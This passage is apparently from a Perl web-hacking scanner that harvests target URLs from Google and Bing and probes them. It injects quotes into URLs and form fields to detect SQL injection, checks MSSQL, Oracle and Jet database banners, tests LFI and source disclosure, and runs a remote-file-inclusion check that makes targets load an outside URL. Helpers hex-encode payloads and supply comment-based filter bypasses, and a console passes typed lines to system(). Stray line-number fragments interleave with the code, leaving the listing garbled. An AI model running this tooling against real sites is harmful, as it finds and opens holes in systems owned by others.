# `Options -Indexes` or nginx's `autoindex off`) removes the finding.
sub simple {

    my $code  = toma( $_[0] );
    my @links = get_links($code);

    for my $com (@links) {
        my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
        if ( $path =~ /\/(.*)$/ ) {
            my $path1 = $1;

            # Strip the path from the page URL (unquoted regex).
            $_[0] =~ s/$path1//ig;

            # From here on $auth and $path describe the link, not the page.
            my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
            if ( $path =~ /(.*)\// ) {
                my $parche = $1;
                unless ( $repetidos =~ /$parche/ ) {
                    $repetidos .= " " . $parche;
                    my $code = toma( "http://" . $auth . $parche );
                    if ( $code =~ /Index of (.*)</ig ) {
                        my $dir_found = $1;
                        chomp $dir_found;
                        $total_vulnerables++;
                        printear(
                            "[+] Directory Found : "
                              . "http://"
                              . $auth
                              . $parche . "\n",
                            "text", "11", "5"
                        );
                        savefile( "paths-logs.txt",
                                "[+] Directory Found : "
                              . "http://"
                              . $auth
                              . $parche );
                    }
                }
            }
        }
    }
}
4843 | ||
sub scansql {

    # Error-based SQL check for one URL.
    #   1. GET: requests $page with a single quote appended and searches the
    #      body for MySQL/PHP error text.
    #   2. POST (only when step 1 found nothing and $page has a query string):
    #      parses the forms of the page without its query string, fills every
    #      non-submit field with a single quote, posts the form once per
    #      submit button and searches the reply for the same error text.
    # Hits are counted in $total_vulnerables, printed via printear() and
    # appended to sql-logs.txt via savefile().
    # The check only recognises error text echoed back by the application; a
    # site that does not display database errors produces no match here.
    my $page  = shift;
    my $copia = $page;    # not used again in this sub

    # $co is assigned without "my", so it is a package variable.
    $co = toma( $page . "'" );

    # NOTE(review): mysql_free_result and mysql_fetch_assoc are each tested
    # twice, and "Call to undefined function" matches any PHP fatal error of
    # that kind, so it can report pages unrelated to SQL.
    if ( $co =~
/supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
        || $co =~ /mysql_free_result/ig
        || $co =~ /mysql_fetch_assoc/ig
        || $co =~ /mysql_num_rows/ig
        || $co =~ /mysql_fetch_array/ig
        || $co =~ /mysql_fetch_assoc/ig
        || $co =~ /mysql_query/ig
        || $co =~ /mysql_free_result/ig
        || $co =~ /equivocado en su sintax/ig
        || $co =~ /You have an error in your SQL syntax/ig
        || $co =~ /Call to undefined function/ig )
    {
        savefile( "sql-logs.txt", "[+] SQL : $page" );
        $total_vulnerables++;
        printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
    }
    else {

        if ( $page =~ /(.*)\?(.*)/ ) {

            # Inner $page is the URL up to (not including) the last "?".
            my $page = $1;

            my @testar = HTML::Form->parse( toma($page), "/" );
            my @botones_names;
            my @botones_values;
            my @orden;         # declared but unused in this sub
            my @get_founds;    # declared but unused in this sub
            my @post_founds;
            my @ordenuno;
            my @ordendos;      # declared but unused in this sub

            my $contador_forms = 0;

            my $valor = "doddyhackman";    # declared but unused in this sub

            for my $test (@testar) {
                $contador_forms++;
                if ( $test->method eq "POST" ) {
                    my @inputs = $test->inputs;
                    for my $in (@inputs) {
                        if ( $in->type eq "submit" ) {

                            # NOTE(review): for an unnamed button both
                            # "submit" and the empty name are pushed, while
                            # only one value is pushed, so the two arrays
                            # stop lining up from that point on.
                            if ( $in->name eq "" ) {
                                push( @botones_names, "submit" );
                            }
                            push( @botones_names,  $in->name );
                            push( @botones_values, $in->value );
                        }
                        else {
                            # Every other field is paired with a single quote.
                            push( @ordenuno, $in->name, "'" );
                        }
                    }

                    # The button and field arrays are declared outside the
                    # form loop, so entries from earlier forms are posted
                    # again with later ones.
                    for my $n ( 0 .. int(@botones_names) - 1 ) {
                        my @preuno = @ordenuno;
                        push( @preuno,
                            $botones_names[$n], $botones_values[$n] );

                        # Posts to the page URL, not to the form's own action.
                        my $code = $nave->post( $page, \@preuno )->content;
                        if ( $code =~
/supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
                            || $code =~ /mysql_free_result/ig
                            || $code =~ /mysql_fetch_assoc/ig
                            || $code =~ /mysql_num_rows/ig
                            || $code =~ /mysql_fetch_array/ig
                            || $code =~ /mysql_fetch_assoc/ig
                            || $code =~ /mysql_query/ig
                            || $code =~ /mysql_free_result/ig
                            || $code =~ /equivocado en su sintax/ig
                            || $code =~
                            /You have an error in your SQL syntax/ig
                            || $code =~ /Call to undefined function/ig )
                        {
                            # Unnamed forms are recorded by position, named
                            # forms by name. "name" is a bareword here.
                            if (   $test->attr(name) eq ""
                                or $test->attr(name) eq " " )
                            {
                                push( @post_founds, $contador_forms );
                            }
                            else {
                                push( @post_founds, $test->attr(name) );
                            }
                        }
                    }
                }

                # The right-hand side still refers to the outer @post_founds;
                # the new lexical holds the de-duplicated copy for this
                # iteration only.
                my @post_founds = repes(@post_founds);

                # "ne" compares as strings; the count is numeric.
                if ( int(@post_founds) ne 0 ) {
                    for my $t (@post_founds) {

                        # Only purely numeric entries (form positions) are
                        # reported; forms recorded by name are skipped.
                        if ( $t =~ /^\d+$/ ) {
                            $total_vulnerables++;
                            savefile( "sql-logs.txt",
                                "[+] SQLI : Form $t in $page" );
                            printear(
                                "[+] SQLI : Form $t in $page\n\a", "text",
                                "11", "5"
                            );
                        }
                    }
                }
            }
        }
    }
}
4952 | ||
sub access {

    # Requests $page with a single quote appended and reports the page when
    # the response body carries a Microsoft JET / Access ODBC driver banner.
    # A hit is printed, appended to jetdb-logs.txt and counted in
    # $total_vulnerables. $code1 is a package variable.
    my ($page) = @_;
    my $probe = $page . "'";
    $code1 = toma($probe);

    my $banner_seen = ( $code1 =~ /Microsoft JET Database/ig
          or $code1 =~ /ODBC Microsoft Access Driver/ig );

    if ($banner_seen) {
        printear( "[+] Jet DB : $page\a\n", "text", "11", "5" );
        savefile( "jetdb-logs.txt", $page );
        $total_vulnerables++;
    }
}
4965 | ||
sub mssql {

    # Requests $page with a single quote appended and reports the page when
    # the body contains the "ODBC SQL Server Driver" error banner. A hit is
    # printed, appended to mssql-logs.txt and counted in $total_vulnerables.
    my ($page) = @_;
    my $probe = $page . "'";
    $code1 = toma($probe);    # package variable, shared with sibling checks

    if ( $code1 =~ /ODBC SQL Server Driver/ig ) {
        printear( "[+] MSSQL : $page\a\n", "text", "11", "5" );
        savefile( "mssql-logs.txt", $page );
        $total_vulnerables++;
    }
}
4976 | ||
sub oracle {

    # Requests $page with a single quote appended and reports the page when
    # the body contains the "Microsoft OLE DB Provider for Oracle" banner.
    # A hit is printed, appended to oracle-logs.txt and counted in
    # $total_vulnerables.
    my ($page) = @_;
    my $probe = $page . "'";
    $code1 = toma($probe);    # package variable, shared with sibling checks

    if ( $code1 =~ /Microsoft OLE DB Provider for Oracle/ig ) {
        printear( "[+] Oracle : $page\a\n", "text", "11", "5" );
        savefile( "oracle-logs.txt", $page );
        $total_vulnerables++;
    }
}
4987 | ||
sub rfi {

    # Appends a fixed external URL to $page, fetches the result and reports
    # the page when a phrase from that external site shows up in the body.
    # The check therefore depends on that third-party page keeping the same
    # text. A hit is printed, appended to rfi-logs.txt and counted in
    # $total_vulnerables.
    my ($page) = @_;
    my $probe = $page . "http:/www.supertangas.com/";
    $code1 = toma($probe);    # package variable, shared with sibling checks

    if ( $code1 =~ /Los mejores TANGAS de la red/ig ) {
        printear( "[+] RFI : $page\a\n", "text", "11", "5" );
        savefile( "rfi-logs.txt", $page );
        $total_vulnerables++;
    }
}
4998 | ||
sub lfi {

    # Requests $page with a single quote appended and reports the page when
    # the body contains PHP's "No such file or directory in <b>...</b> on
    # line" warning, i.e. when the application displays file-open errors.
    # A hit is printed, appended to lfi-logs.txt and counted in
    # $total_vulnerables.
    my ($page) = @_;
    my $probe = $page . "'";
    $code1 = toma($probe);    # package variable, shared with sibling checks

    if ( $code1 =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) {
        printear( "[+] LFI : $page\a\n", "text", "11", "5" );
        savefile( "lfi-logs.txt", $page );
        $total_vulnerables++;
    }
}
5008 | ||
sub fsd {

    # Takes the file name that sits between the last "/" and the "?" of
    # $page, appends it to $page and fetches the result. The page is
    # reported when the body contains PHP source text of the form
    # header(...Content-Disposition: attachment; . A hit is printed, counted
    # in $total_vulnerables and appended to fpd-logs.txt.
    my ($page) = @_;

    # Stays undefined when $page has no "/name?" part, as in the original.
    my $archivo = ( $page =~ /(.*)\/(.*)\?/ ) ? $2 : undef;

    my $code = toma( $page . $archivo );

    if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) {
        printear( "[+] Full Source Discloure : $page\a\n",
            "text", "11", "5" );
        $total_vulnerables++;
        savefile( "fpd-logs.txt", $page );
    }

}
5030 | ||
sub men {

    # Prints the scan-type menu through printear() and returns the value
    # printear() gives back for the "stdin" prompt (presumably the line the
    # operator typed; confirm against printear()).
    printear( "\n[+] Scan Type : \n", "text", "5", "5" );
    printear( "
[X] : XSS
[S] : SQL GET/POST
[K] : SQL GET
[Q] : SQL GET + Admin
[Y] : Directory listing
[M] : MSSQL
[J] : Jet Database
[O] : Oracle
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[HT] : HTTP Information
[A] : All
", "logos", "13", "5" );
    my $option = printear( "\n[Options] : ", "stdin", "11", "13" );
    return $option;
}
5051 | ||
sub finish_now {

    # Thin alias: hands control to adios() and passes its result through.
    return adios();
}
5055 | ||
sub bing {

    # Collects result links from Bing for the query $a, walking the "first"
    # offset from 10 up to $b in steps of 10, and returns the links after
    # cortar() and repes() have been applied.
    # Lexical $a/$b shadow the package variables that sort() uses.
    my ( $a, $b ) = @_;

    # $pages is a package variable (no "my").
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {

        # $a is concatenated into the URL as given; no escaping is applied
        # here.
        my $code =
          toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );

        # These pushes go to the package-level @founds, because the lexical
        # @founds below is not declared yet at this point.
        # NOTE(review): that array is not emptied in this sub, so entries from
        # earlier calls would be carried over; confirm against callers.
        while ( $code =~ /<h3><a href="(.*?)"/mig ) {
            push( @founds, $1 );
        }

        while ( $code =~ /<h2><a href="(.*?)"/mig ) {
            push( @founds, $1 );
        }
    }

    # New lexical built from the package-level array.
    my @founds = repes( cortar(@founds) );
    return @founds;
}
5074 | ||
sub google {

    # Collects result links from Google for the query $a, walking the
    # "start" offset from 10 up to $b in steps of 10, and returns the
    # URL-unescaped links after cortar() and repes() have been applied.
    # Lexical $a/$b shadow the package variables that sort() uses.
    my ( $a, $b ) = @_;
    my @founds;

    # $pages and $code are package variables (no "my").
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {

        # $a is concatenated into the URL as given; no escaping is applied
        # here.
        $code =
          toma( "https://www.google.com.ar/search?hl=&q="
              . $a
              . "&start=$pages" );

        # Matches the href that follows a class="r" heading; this depends on
        # the markup of the result page staying the same.
        while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) {
            my $url = $1;
            push( @founds, uri_unescape($url) );

        }
    }

    # Re-declares @founds in the same scope; the right-hand side still reads
    # the array declared at the top of the sub.
    my @founds = repes( cortar(@founds) );
    return @founds;
}
5092 | ||
5093 | } ## | |
5094 | ||
sub load_cmd {

    # Interactive local command console: shows a banner, then loops forever
    # reading a command line through printear() and running it with
    # system(). Typing "exit" calls adios().
    head_console();

    # Clears the screen and prints the console banner. Although written
    # inside load_cmd, a named sub is compiled at package level.
    sub head_console {
        clean();
        printear( "


@@@@ @@@@ @ @ @@@ @@@@ @ @@@@@
@ @ @ @ @@ @ @ @ @ @ @ @
@ @ @ @@ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @@@ @ @ @ @@@@
@ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@ @ @ @ @ @
@ @ @ @ @ @@ @ @ @ @ @ @
@@@@ @@@@ @ @ @@@ @@@@ @@@@@ @@@@@



", "logos", "7", "5" );
    }

    while (1) {
        my $cmd = printear( "\n[+] Command : ", "stdin", "11", "13" );
        print "\n";
        if ( $cmd eq "exit" ) {
            adios();
        }
        else {
            # data.txt is re-read for every command to look up the colour
            # setting.
            my $data = getdatanownownownow();

            # system() with a single string hands the line to the shell, so
            # the command runs with the privileges of whoever started this
            # script. The input comes from the local prompt above.
            if ( $data =~ /colors=n/ ) {
                system($cmd);
            }
            else {
                # cprint is defined outside this block; the escape strings
                # presumably switch the output colour around the command.
                cprint "\x037";
                system($cmd);
                cprint "\x030";
            }
        }
    }

}    ##
5139 | ||
5140 | ## | |
5141 | ||
5142 | ##Funciones secundarias ### | |
5143 | ||
sub toma {

    # GET the URL in $_[0] with the shared user agent $nave and return the
    # response body.
    my $response = $nave->get( $_[0] );
    return $response->content;
}
5147 | ||
sub tomados {

    # GET the URL in $_[0] with the shared user agent $nave and return the
    # whole response object rather than only its body.
    my $response = $nave->get( $_[0] );
    return $response;
}
5151 | ||
sub tomar {

    # POST the key/value pairs of the hash reference $var to $web with the
    # shared user agent $nave and return the response body. The hash is
    # flattened into a list, so field order follows hash order.
    my ( $web, $var ) = @_;
    my @fields   = %$var;
    my $response = $nave->post( $web, [@fields] );
    return $response->content;
}
5156 | ||
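sub ver_length {

    # Returns the string "true" when the argument is exactly 32 characters
    # long, and an empty list (false) otherwise. Presumably used to spot
    # values shaped like a hex MD5 digest; confirm against callers.
    #
    # The original returned the bareword true, which only compiles without
    # "use strict", and fell off the end of the sub for any other length.
    # An undefined argument is treated as an empty string.
    my $value = defined $_[0] ? $_[0] : '';
    return 'true' if length($value) == 32;
    return;
}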
5160 | ||
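sub savefile {

    # Appends $_[1] plus a newline to logs/<$_[0]>.
    # Returns 1 when the line was written, an empty list otherwise.
    #
    # Changes from the original: three-argument open with a lexical handle
    # (the two-argument form parsed the mode out of the same string as the
    # file name and used the global bareword handle SAVE), and open/close
    # failures are reported instead of being ignored. Logging stays
    # best-effort: a failure warns and returns, it does not die.
    #
    # The file name is used as given. Callers that build it from remote data
    # should make sure it cannot contain path separators.
    my ( $name, $line ) = @_;
    my $path = "logs/" . $name;

    my $out;
    unless ( open( $out, '>>', $path ) ) {
        warn "savefile: cannot append to $path: $!\n";
        return;
    }
    print {$out} $line . "\n";
    unless ( close($out) ) {
        warn "savefile: close failed for $path: $!\n";
        return;
    }
    return 1;
}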
5166 | ||
sub get_links {

    # Parses the HTML in $_[0] with HTML::LinkExtor, using agarrar() as the
    # per-tag callback, and returns the package-level @links array.
    # NOTE(review): @links is not emptied in this sub, so unless a caller
    # clears it, values collected by earlier calls are returned again.
    # $test is a package variable (no "my") and is not used afterwards here.
    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
    return @links;

    # Callback: receives the tag name followed by attribute/value pairs and
    # appends every attribute value to @links. Although written inside
    # get_links, a named sub is compiled at package level.
    sub agarrar {
        my ( $a, %b ) = @_;
        push( @links, values %b );
    }
}
5177 | ||
sub adios {

    # Shows the "press enter" notice, waits for one line on standard input
    # and then calls estoydentro() (the main menu, going by the notice text).
    my $notice = "\n[+] Press the enter key to return to main menu\n";
    printear( $notice, "text", "13", "5" );
    <stdin>;
    return estoydentro();
}
5184 | ||
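sub savefilear {

    # Appends $_[1] plus a newline to logs/webs/<$_[0]>.
    # Returns 1 when the line was written, an empty list otherwise.
    #
    # Changes from the original: three-argument open with a lexical handle
    # (the two-argument form parsed the mode out of the same string as the
    # file name and used the global bareword handle SAVE), and open/close
    # failures are reported instead of being ignored. Logging stays
    # best-effort: a failure warns and returns, it does not die.
    #
    # The file name is used as given. Callers that build it from remote data
    # should make sure it cannot contain path separators.
    my ( $name, $line ) = @_;
    my $path = "logs/webs/" . $name;

    my $out;
    unless ( open( $out, '>>', $path ) ) {
        warn "savefilear: cannot append to $path: $!\n";
        return;
    }
    print {$out} $line . "\n";
    unless ( close($out) ) {
        warn "savefilear: close failed for $path: $!\n";
        return;
    }
    return 1;
}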
5190 | ||
sub partimealmedio {

    # Returns the authority part (host, plus port if present) of the URL in
    # $_[0], with its first ":" replaced by "_".
    my $authority = ( uri_split( $_[0] ) )[1];
    ( my $save = $authority ) =~ s/:/_/;
    return $save;
}
5197 | ||
sub encode {

    # Returns "0x" followed by the hexadecimal code of each character of
    # $_[0]. The result is also left in the package variable $hex.
    # Codes below 0x10 come out as a single digit, as in the original, so
    # such output does not split back into two-digit pairs.
    my $text = $_[0];
    my @digits = map { sprintf( "%x", ord($_) ) } split //, $text;
    $hex = '0x' . join( '', @digits );
    return $hex;
}
5206 | ||
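sub decode {

    # Turns a hex string, with or without a leading "0x", back into text by
    # reading it two digits at a time. A trailing odd digit is ignored.
    #
    # The original ran s/^0x// directly on $_[0], which aliases the caller's
    # argument: a call with a string literal died with "Modification of a
    # read-only value attempted". The work is now done on a copy. For
    # callers that pass a variable, the stripped value is still written back
    # when the argument is writable. The result is kept in a lexical instead
    # of the package variable $encode.
    my $digits = defined $_[0] ? $_[0] : '';
    $digits =~ s/^0x//;

    my $text = join q[], map { chr hex } $digits =~ /../g;

    if ( defined $_[0] ) {
        local $@;
        eval { $_[0] = $digits; 1 };    # no-op for read-only arguments
    }
    return $text;
}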
5212 | ||
sub bypass {

    # Returns a two-element list chosen by $_[0]:
    #   "/*"     -> ( "/**/", "/**/" )
    #   "%20"    -> ( "%20",  "%00" )
    #   other    -> ( "+",    "--" )
    my $style = $_[0];
    return ( "/**/", "/**/" ) if $style eq "/*";
    return ( "%20",  "%00" )  if $style eq "%20";
    return ( "+", "--" );
}
5218 | ||
sub ascii {

    # Returns the code points of $_[0] as a comma-separated decimal string.
    my @codes = unpack "U*", $_[0];
    return join( ',', @codes );
}
5222 | ||
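sub ascii_de {

    # Turns a comma-separated list of decimal character codes back into
    # text and returns it.
    #
    # The original assigned the result to $_[0], which aliases the caller's
    # argument: a call with a string literal died with "Modification of a
    # read-only value attempted". The result is now built in a lexical. For
    # callers that pass a variable, it is still written back when the
    # argument is writable.
    my $list = defined $_[0] ? $_[0] : '';
    my $text = join q[], map { chr } split q[,], $list;

    if ( defined $_[0] ) {
        local $@;
        eval { $_[0] = $text; 1 };    # no-op for read-only arguments
    }
    return $text;
}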
5227 | ||
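sub installer_kobra {

    # Creates logs/ and logs/webs/ under the current working directory when
    # they are missing. Returns 1 on success, an empty list when a directory
    # could not be created.
    #
    # Fixes relative to the original:
    #  - the existence test looked at the absolute path "/logs/webs" while
    #    the directories are created relative to the working directory;
    #  - mkdir was given decimal 777 (octal 1411) instead of an octal mode;
    #  - chmod was called with the path first and the mode second, so it
    #    never changed the directories.
    # The mode is 0755 rather than 0777: the logs hold scan results and do
    # not need to be writable by other local users.
    return 1 if -d "logs/webs";

    for my $dir ( "logs", "logs/webs" ) {
        next if -d $dir;
        unless ( mkdir( $dir, 0755 ) ) {
            warn "installer_kobra: cannot create $dir: $!\n";
            return;
        }
    }
    return 1;
}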
5236 | ||
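sub cortar {

    # For every argument that contains "=", keeps the text before the first
    # "=" and re-appends "="; other arguments are passed through unchanged.
    # Returns the resulting list in the same order.
    #
    # The original stored the split result in the package variable @tengo
    # and read it with the one-element slice @tengo[0]; both are replaced by
    # a lexical scalar.
    my @nuevo;
    for my $item (@_) {
        if ( $item =~ /=/ ) {
            my ($head) = split( /=/, $item );
            $head = '' unless defined $head;    # item was only "="
            push( @nuevo, $head . "=" );
        }
        else {
            push( @nuevo, $item );
        }
    }
    return @nuevo;
}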
5250 | ||
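sub installer_par {

    # Creates logs/ under the current working directory when it is missing.
    # Returns 1 on success, an empty list when it could not be created.
    #
    # Fixes relative to the original:
    #  - mkdir was given the string "777", which is decimal 777 (octal 1411)
    #    rather than an octal mode;
    #  - chmod was called with the path first and the mode second, so it
    #    never changed the directory.
    # The mode is 0755 rather than 0777: the logs hold scan results and do
    # not need to be writable by other local users.
    return 1 if -d "logs/";

    unless ( mkdir( "logs", 0755 ) ) {
        warn "installer_par: cannot create logs: $!\n";
        return;
    }
    return 1;
}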
5257 | ||
sub repes {

    # Returns the arguments that have not been seen before, in order.
    # "Seen" is tracked in the package-level hash %repe, which this sub
    # never clears, so a value returned by one call is dropped by every
    # later call as well.
    my @limpio = grep { !$repe{$_}++ } @_;
    return @limpio;
}
5265 | ||
sub nombre {

    # Returns the authority part (host, plus port if present) of the URL in
    # $_[0], as produced by uri_split().
    my @parts = uri_split( $_[0] );
    return $parts[1];
}
5270 | ||
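sub savewordss {

    # Reads the file named in $_[0] and returns its lines (line endings
    # kept). Returns an empty list when the file cannot be opened.
    #
    # The original used two-argument open on the bare argument, so a name
    # starting with ">" or ending with "|" was treated as a mode or a
    # command instead of a file to read. Three-argument open with an
    # explicit "<" reads the named file and nothing else. The bareword
    # handle FILE is replaced by a lexical one and a failed open is
    # reported.
    my ($path) = @_;
    my @words;

    my $in;
    if ( defined $path and open( $in, '<', $path ) ) {
        @words = <$in>;
        close $in;
    }
    else {
        my $shown = defined $path ? $path : '(undef)';
        warn "savewordss: cannot read $shown: $!\n";
    }
    return @words;
}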
5282 | ||
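sub savewords {

    # Returns the whole content of the file named in $_[0] as one string,
    # or undef when the file cannot be opened.
    #
    # The original ran "undef $/;" without local, which switched off line
    # splitting for the rest of the program: every later <HANDLE> read,
    # including prompts on standard input, would then read to end of file.
    # The record separator is now changed only inside this sub, and a
    # failed open is reported.
    my ($path) = @_;

    my $on;
    unless ( defined $path and open( $on, '<', $path ) ) {
        my $shown = defined $path ? $path : '(undef)';
        warn "savewords: cannot read $shown: $!\n";
        return undef;    ## no critic: scalar result is part of the interface
    }

    my $contenido = do { local $/; <$on> };
    close $on;

    return $contenido;

}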
5293 | ||
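sub borrar_archivos {

    # Deletes every plain file directly inside the directory $_[0].
    # Sub-directories and their content are left alone. Returns the number
    # of files removed, or an empty list when the directory cannot be read.
    #
    # The original ignored a failed opendir and went on to call readdir on
    # an unopened handle; that case now warns and returns. A file that
    # cannot be removed is reported instead of being skipped silently.
    my ($dir) = @_;

    my $list;
    unless ( defined $dir and opendir( $list, $dir ) ) {
        my $shown = defined $dir ? $dir : '(undef)';
        warn "borrar_archivos: cannot read directory $shown: $!\n";
        return;
    }
    my @aborrar = readdir $list;
    closedir $list;

    my $removed = 0;
    for my $borrar (@aborrar) {
        my $path = $dir . "/" . $borrar;
        next unless -f $path;
        if ( unlink($path) ) {
            $removed++;
        }
        else {
            warn "borrar_archivos: cannot remove $path: $!\n";
        }
    }
    return $removed;

}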
5307 | ||
sub getdatanownownownow {

    # Returns the full text of data.txt from the current working directory.
    # The open is not checked, as in the original: a missing file yields an
    # empty string.
    open( my $settings, q[<], "data.txt" );
    my @lines = <$settings>;
    close($settings);
    return join( q[], @lines );
}
5314 | ||
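sub savefil {

    # Appends $_[1], with no newline added, to the file named in $_[0].
    # Returns 1 when the text was written, an empty list otherwise.
    #
    # Changes from the original: three-argument open with a lexical handle
    # (the two-argument form parsed the mode out of the same string as the
    # file name and used the global bareword handle SAVE), and open/close
    # failures are reported instead of being ignored.
    my ( $path, $text ) = @_;

    my $out;
    unless ( defined $path and open( $out, '>>', $path ) ) {
        my $shown = defined $path ? $path : '(undef)';
        warn "savefil: cannot append to $shown: $!\n";
        return;
    }
    print {$out} $text;
    unless ( close($out) ) {
        warn "savefil: close failed for $path: $!\n";
        return;
    }
    return 1;
}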
5320 | ||
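sub cargarlogs {

    # Opens the file or address in $_[0]: with "start" where the OS name
    # matches /Win/, with firefox elsewhere. Returns the status from
    # system(), or an empty list when the argument is refused.
    #
    # The original concatenated the argument into a single command string,
    # so the shell interpreted any metacharacters in it. That matters if
    # the name is ever built from scanned data such as a host name.
    #  - Elsewhere than Windows the program is now run with list-form
    #    system(), which does not involve a shell.
    #  - "start" is a cmd.exe built-in and needs the shell, so on that
    #    branch arguments containing cmd.exe syntax characters are refused.
    #  - An argument starting with "-" is refused so it cannot be read as an
    #    option.
    # NOTE(review): /Win/i also matches "darwin" and "cygwin"; the test is
    # kept as it was.
    my ($target) = @_;

    unless ( defined $target and length $target ) {
        warn "cargarlogs: nothing to open\n";
        return;
    }
    if ( $target =~ /^-/ ) {
        warn "cargarlogs: refusing argument that looks like an option\n";
        return;
    }

    if ( $^O =~ /Win/i ) {
        if ( $target =~ /[&|<>^%"\r\n]/ ) {
            warn "cargarlogs: refusing argument with shell characters\n";
            return;
        }
        return system( "start " . $target );
    }

    return system( "firefox", $target );
}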
5330 | ||
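sub system_leida {

    # Opens the file in $_[0]: with "start" where the OS name matches /Win/,
    # with gedit elsewhere. Returns the status from system(), or an empty
    # list when the argument is refused.
    #
    # The original concatenated the argument into a single command string,
    # so the shell interpreted any metacharacters in it. That matters if
    # the name is ever built from scanned data such as a host name.
    #  - Elsewhere than Windows the program is now run with list-form
    #    system(), which does not involve a shell.
    #  - "start" is a cmd.exe built-in and needs the shell, so on that
    #    branch arguments containing cmd.exe syntax characters are refused.
    #  - An argument starting with "-" is refused so it cannot be read as an
    #    option.
    # NOTE(review): /Win/i also matches "darwin" and "cygwin"; the test is
    # kept as it was.
    my ($target) = @_;

    unless ( defined $target and length $target ) {
        warn "system_leida: nothing to open\n";
        return;
    }
    if ( $target =~ /^-/ ) {
        warn "system_leida: refusing argument that looks like an option\n";
        return;
    }

    if ( $^O =~ /Win/i ) {
        if ( $target =~ /[&|<>^%"\r\n]/ ) {
            warn "system_leida: refusing argument with shell characters\n";
            return;
        }
        return system( "start " . $target );
    }

    return system( "gedit", $target );
}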
5340 | ||
5341 | ## | |
5342 | ||
5343 | #The End ? |